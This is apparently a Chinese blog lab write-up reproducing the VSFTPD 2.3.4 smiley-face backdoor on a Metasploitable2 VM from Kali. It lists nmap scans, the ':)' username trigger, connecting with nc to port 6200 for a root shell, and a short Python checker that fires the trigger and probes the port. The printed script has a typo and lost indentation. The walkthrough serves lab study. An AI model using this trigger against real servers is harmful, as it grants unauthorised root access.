笑脸漏洞(VSFTPD2.3.4)
在VSFTPD2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令
攻击机:kali
靶机: Metasploitable2-Linux,这是一个集成了很多漏洞的平台
复现过程
首先打开kali root模式,输入ipconfig查看自己的ip

然后输入
nmap 192.168.219.0/24
nmap扫描同网段的靶机,观察靶机上的服务开放情况

使用nmap扫描运行的服务的版本信息
nmap -sV 192.168.219.129

可以看到21端口版本是VSFTPD2.3.4
之后利用netcat,连接靶机的21端口,输入user带有:),pass随便输入。
例如:user a:) pass 123456

用nmap扫描6200端口 ,观察端口打开情况

6200端口已经open
用nc连接6200端口,成功以root身份登入,漏洞复现完毕

漏洞检测
在 Kali 中新建文本文档,写入 Python 脚本代码,命名为smile.py
mport socket
from ftplib import FTP
url = input("输入检测地址:")
ftp = FTP()
username = 'user:)'
password = '123456'
try:
ftp.connect(url, 21, timeout=1)
ftp.login(username, password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket()
s.connect((url, 6200))
s.close()
print("存在笑脸漏洞")
except:
print("不存在笑脸漏洞")
由于之前我们已经开放6200端口,所以直接在桌面打开命令行,输入
python +(文件名)
监测完成

433

被折叠的 条评论
为什么被折叠?



